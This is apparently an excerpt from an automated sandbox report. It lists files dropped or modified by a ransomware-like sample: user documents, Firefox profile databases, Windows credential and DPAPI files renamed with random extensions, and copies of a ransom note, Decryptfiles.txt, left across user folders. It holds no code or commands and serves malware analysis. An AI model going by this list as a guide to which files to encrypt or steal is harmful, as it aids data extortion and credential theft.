C:\Users\user\Downloads\PALRGUCVEH.jpg
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Downloads\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.xlsx
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Downloads\SQSJKEBWDT.xlsx.JQkH (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Bing.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Google.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Live.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url
|
data
|
dropped
|
||
C:\Users\user\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Music\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT.cJXQ
|
data
|
dropped
|
||
C:\Users\user\NTUSER.DAT.qCnN
|
data
|
dropped
|
||
C:\Users\user\OneDrive\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Saved Games\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
|
data
|
dropped
|
||
C:\Users\user\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\_curlrc.uNYF
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.cjKz
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.puIz
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.FdAV
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.tObf
|
data
|
modified
|
||
C:\Users\user\ntuser.ini
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x66b629a6, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms.WzIj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.tLrR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.OiLj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.npGz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.sVfx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.KeOu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.sNid (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.HVOS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.qncC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.PYlZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.teqV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.vmwy
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.sOji (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\3bb58c52-85cd-4424-83c3-47720a094118.bKqV
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.OrxB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c6cd337d-cbfc-4f3d-88c4-6fd10913a1a0.okPN
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.ufhc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.lVQa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.ShPy (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.TkAd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.VCKl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjFl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUFZRAWBIW.png.KiCW (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.hFlS
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.YmlN
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.png.ZoQN (copy)
|
MPEG-4 LOAS, 4 or more streams
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.jpg.kTZy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.xlsx.xShm (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.mp3.YvZq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.cKtC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.xlsx.HJzw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.png.UonT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.docx.ceZd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFOYFBOLXA.pdf.OAHV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EIVQSAOTAQ.jpg.pVsK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx.gRLx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.mp3.PmJs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx.tZhU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf.DlrP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.png.iIjQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GRXZDKKVDB.png.VDCp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HVLFEFMHHB.png.yike (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYCBOPHQBT.jpg.QjAL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUUUSONWY.mp3.csdO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.jpg.kMsv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.mp3.SHdK (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.MKGm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.mp3.kbXS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg.tzyh (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.xlsx.epBN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.wIYr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.jpg.mNlr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.mp3.NMYH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.pdf.uAhJ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx.zMvk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.lpLb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx.LjQt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.docx.TuJp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx.qeut (copy)
|
OpenPGP Public Key Version 7
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx.YxtN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.KRvx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.jpg.mAbp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3.xbaz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf.EQVl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx.vNlY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.docx.OxTZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.pdf.RiQb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.png.NyvD (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.png.YwEB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.mp3.xPvB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.Oewm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.aNtw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.FbeM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.KjSZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.aHcM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.iQyp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.WbXP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json.AEYU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txt.XKfi (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json.QOVf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txt.lUvu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.zrRw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json.ESGz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db.rYtu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini.jOVm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.json.dVLN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite.wuOD (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm.xtfY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite.fTNb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4.nOPz
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4.PeDX
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4.XYFb
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4.LOMZ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4.bzUJ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4.ODpn
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4.yZep
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4.vGPL
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin.qUZj
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update.dBce
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events.vzMK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed.pxDL
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627.CVFc
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610.qHsm
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490.SPWl
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966.ehIM
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json.ivSj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json.mvuG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json.rZKM (copy)
|
zlib compressed data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json.RkSs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm.SnxI (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite.xevd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json.rXlM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db.BkFv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite.ZIjc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt.QpNo (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm.TUCr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite.WVBE (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js.VLXF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite.qTtP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925.iMbU
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24.aKjk
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0.ItEo
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49.eGBp
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.EhgA
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab.YFMO
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.LwtW
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.KPUv
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4.zKql (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.HejR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4.fVxs
(copy)
|
SysEx File -
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.XTKI
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4.DZcJ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.json.jBxi (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite.wqIZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite.EAKu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2.stqu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm.zfRr
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.cgxv
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm.TZCu
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.rnay
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm.eKXZ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite.JwGW
(copy)
|
data
|
dropped
|
||
